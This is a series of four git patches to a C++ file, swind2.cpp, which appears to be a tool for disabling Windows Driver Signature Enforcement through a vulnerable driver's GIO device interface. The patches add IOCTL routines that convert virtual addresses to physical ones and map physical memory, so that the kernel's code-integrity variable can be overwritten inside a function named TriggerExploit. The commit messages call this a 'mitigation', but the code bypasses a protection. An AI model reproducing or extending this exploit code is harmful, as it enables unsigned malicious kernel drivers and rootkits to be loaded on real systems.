From 731ac3ab94232515b64cbf0e8021e16b071c646f Mon Sep 17 00:00:00 2001 From: Kento Oki Date: Sat, 2 Oct 2021 14:29:55 +0900 Subject: [PATCH 1/4] implement 1909 build 18363 DSE mitigation --- src/swind2.cpp | 105 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 105 insertions(+) diff --git a/src/swind2.cpp b/src/swind2.cpp index 1dd2d76..32c4260 100644 --- a/src/swind2.cpp +++ b/src/swind2.cpp @@ -11,6 +11,8 @@ #define GIO_DEVICE_NAME L"\\Device\\GIO" #define FILE_DEVICE_GIO (0xc350) #define IOCTL_GIO_MEMCPY CTL_CODE(FILE_DEVICE_GIO, 0xa02, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define IOCTL_GIO_GETPHYS CTL_CODE(FILE_DEVICE_GIO, 0xa03, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define IOCTL_GIO_MAPPHYS CTL_CODE(FILE_DEVICE_GIO, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS) // Input struct for IOCTL_GIO_MEMCPY typedef struct _GIOMemcpyInput @@ -20,6 +22,18 @@ typedef struct _GIOMemcpyInput ULONG Size; } GIOMemcpyInput, *PGIOMemcpyInput; +// Input struct for IOCTL_GIO_MAPPHYS +#pragma pack (push, 1) +typedef struct _GIO_MAPPHYS +{ + DWORD InterfaceType; + DWORD Bus; + PVOID PhysicalAddress; + DWORD IoSpace; + DWORD Size; +} GIO_MAPPHYS, *PGIO_MAPPHYS; +#pragma pack (pop) + static WCHAR DriverServiceName[MAX_PATH], LoaderServiceName[MAX_PATH]; static @@ -241,6 +255,85 @@ AnalyzeCi( return Status; } +static +PVOID +GetPhysForVirtual(_In_ HANDLE DeviceHandle, _In_ PVOID VirtualAddress) +{ + NTSTATUS Status; + IO_STATUS_BLOCK IoStatusBlock; + + PVOID Address = VirtualAddress; + + Status = NtDeviceIoControlFile(DeviceHandle, + nullptr, + nullptr, + nullptr, + &IoStatusBlock, + IOCTL_GIO_GETPHYS, + &Address, + sizeof(Address), + &Address, + sizeof(Address)); + if (!NT_SUCCESS(Status)) + { + Printf(L"NtDeviceIoControlFile(IOCTL_GIO_GETPHYS) failed: error %08X\n", Status); + return NULL; + } + + return (PVOID)((reinterpret_cast(&Address))->LowPart); +} + +static +PVOID +MapPhysicalForVirtual(_In_ HANDLE DeviceHandle, _In_ PVOID PhysicalAddress, _In_ DWORD Size) +{ + NTSTATUS Status; + IO_STATUS_BLOCK IoStatusBlock; + + GIO_MAPPHYS in = { 0 }; + RtlZeroMemory(&in, sizeof(in)); + in.InterfaceType = 0; + in.Bus = 0; + in.PhysicalAddress = PhysicalAddress; + in.IoSpace = 0; + in.Size = Size; + + Status = NtDeviceIoControlFile(DeviceHandle, + nullptr, + nullptr, + nullptr, + &IoStatusBlock, + IOCTL_GIO_MAPPHYS, + &in, + sizeof(in), + &in, + sizeof(in)); + if (!NT_SUCCESS(Status)) + { + Printf(L"NtDeviceIoControlFile(IOCTL_GIO_MAPPHYS) failed: error %08X\n", Status); + return NULL; + } + + return *reinterpret_cast(&in); +} + +static +NTSTATUS +MitigateCiProtectedContent(_In_ HANDLE DeviceHandle, _In_ PVOID* Address) +{ + PVOID PhysicalAddress = GetPhysForVirtual(DeviceHandle, *Address); + if (!PhysicalAddress) + return STATUS_INVALID_ADDRESS; + + PVOID MappedVirtualAddress = MapPhysicalForVirtual(DeviceHandle, PhysicalAddress, sizeof(DWORD)); + if (!MappedVirtualAddress) + return STATUS_INSUFFICIENT_RESOURCES; + + *Address = MappedVirtualAddress; + + return STATUS_SUCCESS; +} + static int ConvertToNtPath(PWCHAR Dst, PWCHAR Src) // TODO: holy shit this is fucking horrible { wcscpy_s(Dst, sizeof(L"\\??\\") / sizeof(WCHAR), L"\\??\\"); @@ -420,6 +513,18 @@ TriggerExploit( *OldCiOptionsValue = OldCiOptions; } + if (NtCurrentPeb()->OSBuildNumber > 18363) + { + Printf(L"[Build:%d] g_CiProtectedContent mitigation enabled\n", NtCurrentPeb()->OSBuildNumber, *OldCiOptionsValue); + + Status = MitigateCiProtectedContent(DeviceHandle, &CiVariableAddress); + if (!NT_SUCCESS(Status)) + { + Printf(L"MitigateCiProtectedContent failed: error %08X\n", Status); + goto Exit; + } + } + // Set up memcpy input a second time, this time for writing MemcpyInput.Dst = reinterpret_cast(CiVariableAddress); MemcpyInput.Src = CiPatchSize == sizeof(ULONG) From 4588f439f75b0729bbbf9aa2c7ac53913e917c42 Mon Sep 17 00:00:00 2001 From: Kento Oki Date: Sat, 2 Oct 2021 14:31:25 +0900 Subject: [PATCH 2/4] implement 1909 build 18363 DSE mitigation --- src/swind2.cpp | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/swind2.cpp b/src/swind2.cpp index 32c4260..c6f6f22 100644 --- a/src/swind2.cpp +++ b/src/swind2.cpp @@ -513,7 +513,7 @@ TriggerExploit( *OldCiOptionsValue = OldCiOptions; } - if (NtCurrentPeb()->OSBuildNumber > 18363) + if (NtCurrentPeb()->OSBuildNumber < 18363) { Printf(L"[Build:%d] g_CiProtectedContent mitigation enabled\n", NtCurrentPeb()->OSBuildNumber, *OldCiOptionsValue); From f2d5e9331534e0cde78db324d3d9ece8d3b2a63f Mon Sep 17 00:00:00 2001 From: Kento Oki Date: Sat, 2 Oct 2021 14:31:41 +0900 Subject: [PATCH 3/4] implement 1909 build 18363 DSE mitigation --- src/swind2.cpp | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/swind2.cpp b/src/swind2.cpp index c6f6f22..9023687 100644 --- a/src/swind2.cpp +++ b/src/swind2.cpp @@ -11,8 +11,8 @@ #define GIO_DEVICE_NAME L"\\Device\\GIO" #define FILE_DEVICE_GIO (0xc350) #define IOCTL_GIO_MEMCPY CTL_CODE(FILE_DEVICE_GIO, 0xa02, METHOD_BUFFERED, FILE_ANY_ACCESS) -#define IOCTL_GIO_GETPHYS CTL_CODE(FILE_DEVICE_GIO, 0xa03, METHOD_BUFFERED, FILE_ANY_ACCESS) -#define IOCTL_GIO_MAPPHYS CTL_CODE(FILE_DEVICE_GIO, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define IOCTL_GIO_GETPHYS CTL_CODE(FILE_DEVICE_GIO, 0xa03, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define IOCTL_GIO_MAPPHYS CTL_CODE(FILE_DEVICE_GIO, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS) // Input struct for IOCTL_GIO_MEMCPY typedef struct _GIOMemcpyInput From 13ff5627f55c068b0abc4d9872368bc21475710f Mon Sep 17 00:00:00 2001 From: Kento Oki Date: Sat, 2 Oct 2021 14:49:25 +0900 Subject: [PATCH 4/4] implement 1909 build 18363 DSE mitigation --- src/swind2.cpp | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/swind2.cpp b/src/swind2.cpp index 9023687..fe50f80 100644 --- a/src/swind2.cpp +++ b/src/swind2.cpp @@ -515,7 +515,7 @@ TriggerExploit( if (NtCurrentPeb()->OSBuildNumber < 18363) { - Printf(L"[Build:%d] g_CiProtectedContent mitigation enabled\n", NtCurrentPeb()->OSBuildNumber, *OldCiOptionsValue); + Printf(L"[Build:%d] g_CiProtectedContent mitigation enabled\n", NtCurrentPeb()->OSBuildNumber); Status = MitigateCiProtectedContent(DeviceHandle, &CiVariableAddress); if (!NT_SUCCESS(Status))